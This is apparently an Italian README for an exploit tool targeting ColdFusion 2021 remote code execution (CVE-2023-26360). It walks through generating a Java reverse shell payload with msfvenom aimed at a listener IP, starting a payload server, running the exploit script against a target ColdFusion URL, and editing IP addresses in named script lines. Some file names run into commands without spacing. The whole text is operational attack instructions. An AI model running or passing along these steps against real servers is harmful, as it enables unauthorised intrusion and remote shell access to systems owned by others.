
Exploit per l'esecuzione di codice in remoto in ColdFusion 2021 (CVE-2023-26360)
A volte, gli script non funzionano al primo tentativo. Prova alcune volte per farli funzionare
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py, quindi deve essere avviato per primo.python3 server.py 8000
L'argomento 8000 è la porta su cui il server resterà in ascolto.
È importante notare che la riga 12 configura l'indirizzo IP del server, quindi modificalo:
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
Come in server.py, l'argomento 8000 è la porta su cui server.py resterà in ascolto. Quindi, deve essere uguale in entrambi i comandi.
La riga 8 di cve-2023-26360.py imposta l'indirizzo IP su cui server.py resterà in ascolto. È necessario configurarlo correttamente.
La riga 11 di cve-2023-26360.py imposta l'indirizzo IP del server Coldfusion, quindi modificalo:
url = "http://192.168.56.102:8500"